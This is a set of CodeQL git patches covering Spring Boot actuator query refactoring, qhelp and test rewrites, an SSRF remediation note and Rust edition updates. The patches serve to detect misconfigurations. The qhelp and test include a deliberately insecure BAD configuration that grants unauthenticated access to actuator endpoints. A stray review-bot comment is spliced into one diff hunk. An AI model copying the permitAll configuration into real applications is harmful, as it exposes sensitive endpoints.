@@ -14,5 +14,9 @@ public class AuthorizedUrl { public AuthorizationManagerRequestMatcherRegistry permitAll() { return null; } + + public AuthorizationManagerRequestMatcherRegistry hasRole(String role) { + return null; + } } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java index 012997dc5024..be4e14019779 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java +++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java @@ -12,5 +12,9 @@ public class AuthorizedUrl { public ExpressionInterceptUrlRegistry permitAll() { return null; } + + public ExpressionInterceptUrlRegistry hasRole(String role) { + return null; + } } } From 6fe7c7a2334dff8db2df115aa02751cf399f3645 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Mon, 24 Feb 2025 11:44:13 -0500 Subject: [PATCH 020/892] Java: some refactoring --- .../java/frameworks/spring/SpringSecurity.qll | 54 ++++++++++-- .../security/SpringBootActuatorsQuery.qll | 87 +++++-------------- 2 files changed, 69 insertions(+), 72 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll index a8de07ca5bc7..901ed06270e4 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll 
@@ -40,9 +40,9 @@ class TypeAbstractRequestMatcherRegistry extends Class { } /** - * A call to `HttpSecurity.authorizeRequests` method. + * A call to the `HttpSecurity.authorizeRequests` method. * - * Note: this API is deprecated and scheduled for removal + * Note: this method is deprecated and scheduled for removal * in Spring Security 7.0. */ class AuthorizeRequestsCall extends MethodCall { @@ -53,9 +53,9 @@ class AuthorizeRequestsCall extends MethodCall { } /** - * A call to `HttpSecurity.authorizeHttpRequests` method. + * A call to the `HttpSecurity.authorizeHttpRequests` method. * - * Note: the no-argument version of this API is deprecated + * Note: the no-argument version of this method is deprecated * and scheduled for removal in Spring Security 7.0. */ class AuthorizeHttpRequestsCall extends MethodCall { 
@@ -65,7 +65,49 @@ class AuthorizeHttpRequestsCall extends MethodCall { } } -/** A call to `AuthorizedUrl.permitAll` method. */ +/** + * A call to the `HttpSecurity.requestMatcher` method. + * + * Note: this method was removed in Spring Security 6.0. + * It was replaced by `securityMatcher`. + */ +class RequestMatcherCall extends MethodCall { + RequestMatcherCall() { + this.getMethod().hasName("requestMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** + * A call to the `HttpSecurity.requestMatchers` method. + * + * Note: this method was removed in Spring Security 6.0. + * It was replaced by `securityMatchers`. + */ +class RequestMatchersCall extends MethodCall { + RequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to the `HttpSecurity.securityMatcher` method. */ +class SecurityMatcherCall extends MethodCall { + SecurityMatcherCall() { + this.getMethod().hasName("securityMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to the `HttpSecurity.securityMatchers` method. */ +class SecurityMatchersCall extends MethodCall { + SecurityMatchersCall() { + this.getMethod().hasName("securityMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to the `AuthorizedUrl.permitAll` method. */ class PermitAllCall extends MethodCall { PermitAllCall() { this.getMethod().hasName("permitAll") and @@ -73,7 +115,7 @@ class PermitAllCall extends MethodCall { } } -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ +/** A call to the `AbstractRequestMatcherRegistry.anyRequest` method. */ class AnyRequestCall extends MethodCall { AnyRequestCall() { this.getMethod().hasName("anyRequest") and 
diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index d58955a4037e..76607ed794a9 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll 
@@ -5,32 +5,36 @@ private import semmle.code.java.frameworks.spring.SpringSecurity private import semmle.code.java.frameworks.spring.SpringBoot /** - * A call to `HttpSecurity.requestMatcher` method with argument + * A call to an `HttpSecurity` matcher method with argument * `EndpointRequest.toAnyEndpoint()`. */ -private class RequestMatcherCall extends MethodCall { - RequestMatcherCall() { - this.getMethod().hasName("requestMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and +private class HttpSecurityMatcherCall extends MethodCall { + HttpSecurityMatcherCall() { + ( + this instanceof RequestMatcherCall or + this instanceof SecurityMatcherCall + ) and this.getArgument(0) instanceof ToAnyEndpointCall } } /** - * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `EndpointRequest.toAnyEndpoint()`. + * A call to an `HttpSecurity` matchers method with lambda + * argument `EndpointRequest.toAnyEndpoint()`. */ -private class RequestMatchersCall extends MethodCall { - RequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and +private class HttpSecurityMatchersCall extends MethodCall { + HttpSecurityMatchersCall() { + ( + this instanceof RequestMatchersCall or + this instanceof SecurityMatchersCall + ) and this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall } } /** - * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument - * `RequestMatcher.toAnyEndpoint()`. + * A call to an `AbstractRequestMatcherRegistry.requestMatchers` method with + * argument `EndpointRequest.toAnyEndpoint()`. */ private class RegistryRequestMatchersCall extends MethodCall { RegistryRequestMatchersCall() { 
@@ -40,34 +44,7 @@ private class RegistryRequestMatchersCall extends MethodCall { } } -/** - * A call to `HttpSecurity.securityMatcher` method with argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class SecurityMatcherCall extends MethodCall { - SecurityMatcherCall() { - this.getMethod().hasName("securityMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0) instanceof ToAnyEndpointCall - } -} - -/** - * A call to `HttpSecurity.securityMatchers` method with lambda argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class SecurityMatchersCall extends MethodCall { - SecurityMatchersCall() { - this.getMethod().hasName("securityMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall - } -} - -/** - * A call to a method that authorizes requests, e.g. `authorizeRequests` or - * `authorizeHttpRequests`. - */ +/** A call to an `HttpSecurity` method that authorizes requests. */ private class AuthorizeCall extends MethodCall { AuthorizeCall() { this instanceof AuthorizeRequestsCall or 
@@ -75,36 +52,14 @@ private class AuthorizeCall extends MethodCall { } } -/** - * A call to a matcher method with argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class MatcherCall extends MethodCall { - MatcherCall() { - this instanceof RequestMatcherCall or - this instanceof SecurityMatcherCall - } -} - -/** - * A call to a matchers method with argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class MatchersCall extends MethodCall { - MatchersCall() { - this instanceof RequestMatchersCall or - this instanceof SecurityMatchersCall - } -} - /** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { exists(AuthorizeCall authorizeCall | // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeCall.getQualifier() instanceof MatcherCall + authorizeCall.getQualifier() instanceof HttpSecurityMatcherCall or // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeCall.getQualifier() instanceof MatchersCall + authorizeCall.getQualifier() instanceof HttpSecurityMatchersCall | // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) @@ -143,7 +98,7 @@ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { permitAllCall.getQualifier() = registryRequestMatchersCall ) or - exists(Variable v, MatcherCall matcherCall | + exists(Variable v, HttpSecurityMatcherCall matcherCall | // http.securityMatcher(EndpointRequest.toAnyEndpoint()); // http.authorizeRequests([...].permitAll()) v.getAnAccess() = authorizeCall.getQualifier() and From 53cb30dcd00a7f7a1d32f2694781ecc598b8a9af Mon Sep 17 00:00:00 2001 
From: Jami Cogswell
Date: Mon, 24 Feb 2025 15:48:28 -0500
Subject: [PATCH 021/892] Java: update metadata, move from CWE-016 to CWE-200
---
.../CWE/{CWE-016 => CWE-200}/SpringBootActuators.java | 0
.../CWE/{CWE-016 => CWE-200}/SpringBootActuators.qhelp | 0
.../Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.ql | 4 ++--
.../SpringBootActuators}/SpringBootActuatorsTest.expected | 0
.../tests/SpringBootActuators}/SpringBootActuatorsTest.java | 0
.../tests/SpringBootActuators}/SpringBootActuatorsTest.ql | 0
.../semmle/tests/SpringBootActuators}/options | 2 +-
7 files changed, 3 insertions(+), 3 deletions(-)
rename java/ql/src/Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.java (100%)
rename java/ql/src/Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.qhelp (100%)
rename java/ql/src/Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.ql (91%)
rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/SpringBootActuatorsTest.expected (100%)
rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/SpringBootActuatorsTest.java (100%)
rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/SpringBootActuatorsTest.ql (100%)
rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/options (62%)
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java
similarity index 100%
rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java
rename to java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp
similarity index 100%
rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp
rename to java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql similarity index 91% rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql rename to java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql index bac0a72e1441..97d9b506f785 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql @@ -4,11 +4,11 @@ * or even to remote code execution. * @kind problem * @problem.severity error + * @security-severity 6.5 * @precision high * @id java/spring-boot-exposed-actuators * @tags security - * experimental - * external/cwe/cwe-16 + * external/cwe/cwe-200 */ import java diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.expected similarity index 100% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.expected diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java similarity index 100% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql similarity index 100% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.ql 
diff --git a/java/ql/test/query-tests/security/CWE-016/options b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options
similarity index 62%
rename from java/ql/test/query-tests/security/CWE-016/options
rename to java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options
index 38d1d754b69c..161a6ddf23d7 100644
--- a/java/ql/test/query-tests/security/CWE-016/options
+++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/options
@@ -1 +1 @@
-//semmle-extractor-options: --javac-args -cp ${testdir}/../../../stubs/springframework-5.3.8
+//semmle-extractor-options: --javac-args -cp ${testdir}/../../../../../../stubs/springframework-5.3.8
From 26e396732a334d02de6f56b013c62f6c3ae20501 Mon Sep 17 00:00:00 2001
From: Jami Cogswell
Date: Mon, 24 Feb 2025 16:43:19 -0500
Subject: [PATCH 022/892] Java: edit qhelp
---
.../CWE/CWE-200/SpringBootActuators.java | 33 ++++++++++---------
.../CWE/CWE-200/SpringBootActuators.qhelp | 27 +++++++--------
.../SpringBootActuatorsTest.java | 18 +++++-----
3 files changed, 39 insertions(+), 39 deletions(-)
diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java
index 5aec49837cac..5f61127db288 100644
--- a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java
+++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java
@@ -1,22 +1,25 @@ @Configuration(proxyBeanMethods = false) -public class SpringBootActuators extends WebSecurityConfigurerAdapter { +public class CustomSecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); + return http.build(); + } - @Override - protected void configure(HttpSecurity http) throws Exception { - // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().permitAll()); - } } @Configuration(proxyBeanMethods = false) -public class ActuatorSecurity extends WebSecurityConfigurerAdapter { +public class CustomSecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + return http.build(); + } - @Override - protected void configure(HttpSecurity http) throws Exception { - // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); - http.httpBasic(); - } } diff --git a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp index 53ee653aaff3..15675545c42f 100644 --- a/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp +++ b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp @@ -3,24 +3,24 @@ "qhelp.dtd"> -
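Review bot: The GOOD example in `SpringBootActuators.java` requires `hasRole("ENDPOINT_ADMIN")` but no longer configures any way to authenticate, since the old example's `http.httpBasic();` was dropped in the move to `SecurityFilterChain`. As far as the snippet shows the chain fails closed, so nothing is exposed, but a reader who copies it gets endpoints nobody can reach and may be tempted to loosen the rule instead. Consider adding an authentication step before `return http.build();`, for example `http.httpBasic(Customizer.withDefaults());`, or a comment that authentication is configured elsewhere. Both sample classes are also named `CustomSecurityConfiguration`; distinct names would make the BAD and GOOD variants easier to tell apart.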

    Spring Boot includes a number of additional features called actuators that let you monitor -and interact with your web application. Exposing unprotected actuator endpoints via JXM or HTTP -can, however, lead to information disclosure or even to remote code execution vulnerability.

    +

    Spring Boot includes features called actuators that let you monitor and interact with your +web application. Exposing unprotected actuator endpoints can lead to information disclosure or +even to remote code execution.

    -

    Since actuator endpoints may contain sensitive information, careful consideration should be -given about when to expose them. You should take care to secure exposed HTTP endpoints in the same -way that you would any other sensitive URL. If Spring Security is present, endpoints are secured by -default using Spring Security’s content-negotiation strategy. If you wish to configure custom -security for HTTP endpoints, for example, only allow users with a certain role to access them, -Spring Boot provides some convenient RequestMatcher objects that can be used in -combination with Spring Security.

    +

    Since actuator endpoints may contain sensitive information, carefully consider when to expose them, +and secure them as you would any sensitive URL. Actuators are secured by default when using Spring +Security without a custom configuration. If you wish to define a custom security configuration, +consider only allowing users with certain roles access to the endpoints. +

    +

    In the first example, the custom security configuration allows unauthenticated access to all actuator endpoints. This may lead to sensitive information disclosure and should be avoided.

    +

    In the second example, only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints.

    @@ -29,11 +29,8 @@ the actuator endpoints.

  • -Spring Boot documentation: -Actuators. -
  • -
  • -Exploiting Spring Boot Actuators +Spring Boot Reference Documentation: +Endpoints.
  • diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java index 2f54cd442b50..4b5d7614eef6 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/SpringBootActuators/SpringBootActuatorsTest.java @@ -265,17 +265,17 @@ protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throw http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); } - // Spring doc example - // https://docs.spring.io/spring-boot/reference/actuator/endpoints.html#actuator.endpoints.security - public void securityFilterChain(HttpSecurity http) throws Exception { - http.securityMatcher(EndpointRequest.toAnyEndpoint()); - http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator - } + // QHelp Bad example + public void securityFilterChain1(HttpSecurity http) throws Exception { + // BAD: Unauthenticated access to Spring Boot actuator endpoints is allowed + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } // QHelp Good example - protected void configureQhelpGood(HttpSecurity http) throws Exception { + public void securityFilterChain2(HttpSecurity http) throws Exception { // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> - requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().hasRole("ENDPOINT_ADMIN")); } } 
From c2e859c756ac3e2370c359cec9051e078d53c6f2 Mon Sep 17 00:00:00 2001
From: Jami Cogswell
Date: Mon, 24 Feb 2025 17:35:23 -0500
Subject: [PATCH 023/892] Java: add change note
---
.../change-notes/2025-02-24-spring-boot-actuators-promo.md | 4 ++++
1 file changed, 4 insertions(+)
create mode 100644 java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md
diff --git a/java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md b/java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md
new file mode 100644
index 000000000000..0263df2c68c2
--- /dev/null
+++ b/java/ql/src/change-notes/2025-02-24-spring-boot-actuators-promo.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* The query `java/spring-boot-exposed-actuators` has been promoted from experimental to the main query pack. Its results will now appear by default. This query was originally submitted as an experimental query [by @ggolawski](https://github.com/github/codeql/pull/2901).
From 04476ca5f4a64d2348d82d5579e7c7d8ac5bd166 Mon Sep 17 00:00:00 2001
From: Kevin Stubbings
Date: Tue, 25 Feb 2025 00:16:48 -0800
Subject: [PATCH 024/892] Add more choices to SSRF remediation
---
.../CWE-918/ServerSideRequestForgery-end.inc.qhelp | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp b/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp
index 2259680e9f8e..c40fe1d5711e 100644
--- a/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp
+++ b/python/ql/src/Security/CWE-918/ServerSideRequestForgery-end.inc.qhelp
@@ -5,8 +5,11 @@

    To guard against SSRF attacks you should avoid putting user-provided input directly - into a request URL. Instead, either maintain a list of authorized URLs on the server and choose - from that list based on the input provided, or perform proper validation of the input. + into a request URL. On the application level, maintain a list of authorized URLs on the server and choose + from that list based on the input provided. If that is not possible, one should verify the IP address for all user-controlled + requests to ensure they are not private. This requires saving the verified IP address of each domain, + then utilizing a custom HTTP adapter to ensure that future requests to that domain use the verified IP address. + On the network level, you can segment the vulnerable application into its own LAN or block access to specific devices.

    From eff87d24fa3dfa9a57752c1ec34f816fbb8349c9 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:15:19 +0100 Subject: [PATCH 025/892] Rust/Ruby/Python: update rustc and edition --- MODULE.bazel | 4 ++-- python/extractor/tsg-python/Cargo.toml | 2 +- python/extractor/tsg-python/rust-toolchain.toml | 7 ------- python/extractor/tsg-python/tsp/Cargo.toml | 2 +- ruby/extractor/Cargo.toml | 2 +- ruby/extractor/rust-toolchain.toml | 7 ------- rust-toolchain.toml | 8 ++++++++ rust/ast-generator/Cargo.toml | 2 +- rust/autobuild/Cargo.toml | 2 +- rust/extractor/Cargo.toml | 2 +- rust/extractor/macros/Cargo.toml | 2 +- shared/tree-sitter-extractor/Cargo.toml | 2 +- shared/tree-sitter-extractor/rust-toolchain.toml | 7 ------- 13 files changed, 18 insertions(+), 31 deletions(-) delete mode 100644 python/extractor/tsg-python/rust-toolchain.toml delete mode 100644 ruby/extractor/rust-toolchain.toml create mode 100644 rust-toolchain.toml delete mode 100644 shared/tree-sitter-extractor/rust-toolchain.toml diff --git a/MODULE.bazel b/MODULE.bazel index 427f450e7fcf..c4a2526479a5 100644 --- a/MODULE.bazel +++ b/MODULE.bazel @@ -35,9 +35,9 @@ bazel_dep(name = "buildifier_prebuilt", version = "6.4.0", dev_dependency = True # Keep edition and version approximately in sync with internal repo. # the versions there are canonical, the versions here are used for CI in github/codeql, as well as for the vendoring of dependencies. -RUST_EDITION = "2021" +RUST_EDITION = "2024" -RUST_VERSION = "1.82.0" +RUST_VERSION = "1.85.0" rust = use_extension("@rules_rust//rust:extensions.bzl", "rust") rust.toolchain( diff --git a/python/extractor/tsg-python/Cargo.toml b/python/extractor/tsg-python/Cargo.toml index 259d2a7d353d..7ad2c1c949e6 100644 --- a/python/extractor/tsg-python/Cargo.toml +++ b/python/extractor/tsg-python/Cargo.toml 
@@ -4,7 +4,7 @@ name = "tsg-python" version = "0.1.0" authors = ["Taus Brock-Nannestad "] -edition = "2021" +edition = "2024" # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` [dependencies] diff --git a/python/extractor/tsg-python/rust-toolchain.toml b/python/extractor/tsg-python/rust-toolchain.toml deleted file mode 100644 index 5e0bcd3a4763..000000000000 --- a/python/extractor/tsg-python/rust-toolchain.toml +++ /dev/null @@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the Python -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "rustfmt" ] diff --git a/python/extractor/tsg-python/tsp/Cargo.toml b/python/extractor/tsg-python/tsp/Cargo.toml index 29fec37f442e..e36144566627 100644 --- a/python/extractor/tsg-python/tsp/Cargo.toml +++ b/python/extractor/tsg-python/tsp/Cargo.toml @@ -11,7 +11,7 @@ readme = "bindings/rust/README.md" keywords = ["incremental", "parsing", "python"] categories = ["parsing", "text-editors"] repository = "https://github.com/tree-sitter/tree-sitter-python" -edition = "2018" +edition = "2024" build = "bindings/rust/build.rs" include = [ diff --git a/ruby/extractor/Cargo.toml b/ruby/extractor/Cargo.toml index 89daac1d27e4..8d3a94113fa2 100644 --- a/ruby/extractor/Cargo.toml +++ b/ruby/extractor/Cargo.toml @@ -3,7 +3,7 @@ name = "codeql-extractor-ruby" description = "CodeQL Ruby extractor" version = "0.1.0" authors = ["GitHub"] -edition = "2021" +edition = "2024" # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` [dependencies] diff --git a/ruby/extractor/rust-toolchain.toml b/ruby/extractor/rust-toolchain.toml deleted file mode 100644 index aa02ff3d0bda..000000000000 --- a/ruby/extractor/rust-toolchain.toml +++ /dev/null 
@@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the Ruby -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "rustfmt" ] diff --git a/rust-toolchain.toml b/rust-toolchain.toml new file mode 100644 index 000000000000..60e431ae8835 --- /dev/null +++ b/rust-toolchain.toml @@ -0,0 +1,8 @@ +# This file specifies the Rust version used to develop and test the +# extractors written in rust. It is set to the lowest version of Rust +# we want to support. + +[toolchain] +channel = "1.85" +profile = "minimal" +components = [ "clippy", "rustfmt" ] diff --git a/rust/ast-generator/Cargo.toml b/rust/ast-generator/Cargo.toml index 6a2db2b0da82..d239ed3de089 100644 --- a/rust/ast-generator/Cargo.toml +++ b/rust/ast-generator/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "ast-generator" version = "0.1.0" -edition = "2021" +edition = "2024" license = "MIT" # When updating these dependencies, run `rust/update_cargo_deps.sh` diff --git a/rust/autobuild/Cargo.toml b/rust/autobuild/Cargo.toml index 758ce92df295..240c1a89d482 100644 --- a/rust/autobuild/Cargo.toml +++ b/rust/autobuild/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "codeql-autobuilder-rust" version = "0.1.0" -edition = "2021" +edition = "2024" [dependencies] codeql-extractor = { path = "../../shared/tree-sitter-extractor" } diff --git a/rust/extractor/Cargo.toml b/rust/extractor/Cargo.toml index dc58faa1ce25..3edcbc744db7 100644 --- a/rust/extractor/Cargo.toml +++ b/rust/extractor/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "codeql-rust" version = "0.1.0" -edition = "2021" +edition = "2024" license = "MIT" # When updating these dependencies, run `rust/update_cargo_deps.sh` diff --git a/rust/extractor/macros/Cargo.toml b/rust/extractor/macros/Cargo.toml index 24c5ff5171f1..1f1c44b7d15d 100644 --- a/rust/extractor/macros/Cargo.toml +++ b/rust/extractor/macros/Cargo.toml 
@@ -1,7 +1,7 @@ [package] name = "rust-extractor-macros" version = "0.1.0" -edition = "2021" +edition = "2024" license = "MIT" [lib] diff --git a/shared/tree-sitter-extractor/Cargo.toml b/shared/tree-sitter-extractor/Cargo.toml index fba911e590fa..a24523e7afbc 100644 --- a/shared/tree-sitter-extractor/Cargo.toml +++ b/shared/tree-sitter-extractor/Cargo.toml @@ -1,7 +1,7 @@ [package] name = "codeql-extractor" version = "0.2.0" -edition = "2021" +edition = "2024" authors = ["GitHub"] # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` diff --git a/shared/tree-sitter-extractor/rust-toolchain.toml b/shared/tree-sitter-extractor/rust-toolchain.toml deleted file mode 100644 index fc7eb0871cd5..000000000000 --- a/shared/tree-sitter-extractor/rust-toolchain.toml +++ /dev/null @@ -1,7 +0,0 @@ -# This file specifies the Rust version used to develop and test the shared -# extractor. It is set to the lowest version of Rust we want to support. - -[toolchain] -channel = "1.74" -profile = "minimal" -components = [ "clippy", "rustfmt" ] \ No newline at end of file From e8799e346ddc2ccd9c6f6db0c228f6ad6955b52f Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:16:58 +0100 Subject: [PATCH 026/892] Rust/Python: fix edition-related errors --- python/extractor/tsg-python/tsp/bindings/rust/lib.rs | 2 +- rust/extractor/macros/src/lib.rs | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs index 7a58509e89cf..0d524b28d273 100644 --- a/python/extractor/tsg-python/tsp/bindings/rust/lib.rs +++ b/python/extractor/tsg-python/tsp/bindings/rust/lib.rs @@ -31,7 +31,7 @@ use tree_sitter::Language; -extern "C" { +unsafe extern "C" { fn tree_sitter_python() -> Language; } diff --git a/rust/extractor/macros/src/lib.rs b/rust/extractor/macros/src/lib.rs index b79f0cc29391..5ba496d4661d 100644 
